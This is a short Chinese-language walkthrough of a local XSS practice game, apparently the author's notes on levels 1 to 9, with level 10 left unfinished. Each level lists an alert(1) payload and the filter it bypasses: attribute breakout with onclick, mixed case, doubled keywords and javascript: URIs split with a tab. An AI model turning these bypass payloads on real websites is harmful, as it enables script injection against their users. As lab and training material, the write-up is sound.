Level 1 - 180831
第一关很简单,开胃菜
payload: http://localhost/xss_game/level1.php?name=test123<script>alert(1)</script>
Level 2 - 180831
找到两个思路:
payload: test123"><script>alert(1)</script>#
第一个点被转义了,但是第二个点正常。
只要能实现标签和引号闭合就可以了。
第二种思路是借鉴别人wp,通过onclick点击事件弹窗。
payload: " onclick="alert(1)
Level 3 - 180901
这次使用的是单引号,和第二关思路相同
payload: ' onclick='alert(1)
Level 4 - 180901
和第三关差不多
payload: " onclick="alert(1)
Level 5 - 180901
<script>会被替换成<scr_ipt>,onclick被替换成o_nclick
payload: "><a href=javascript:alert(1)>
点击如图即可执行javascript:alert(1):
Level 6 - 180901
这次过滤了href以及第5关的onclock、script
但是没有过滤大小写
payload: " oNclick="alert(1)
Level 7 - 180901
这次自动删除on关键字,使用重叠关键字写法:
payload: " oOnNclick="alert(1)
Level 8 - 180901
发现javascript会被转义,
payload: javascript:alert(1)
或者javascrip%09t:alert(1)
Level 9 - 180901
有两个点,都尝试一下:
尝试payload: "onclick=alert(1)
发现"被转义了
尝试使用第二个点进行xss测试:
使用tab的%09,或者 t 转义成t
payload: javascrip%09t:alert(1)//http://123.com
或者: javascript:alert(1)//http://123.com
Level 10 - 180901
与第一关类似都是发送get请求,但是发现<>被转义了。
未完成。。。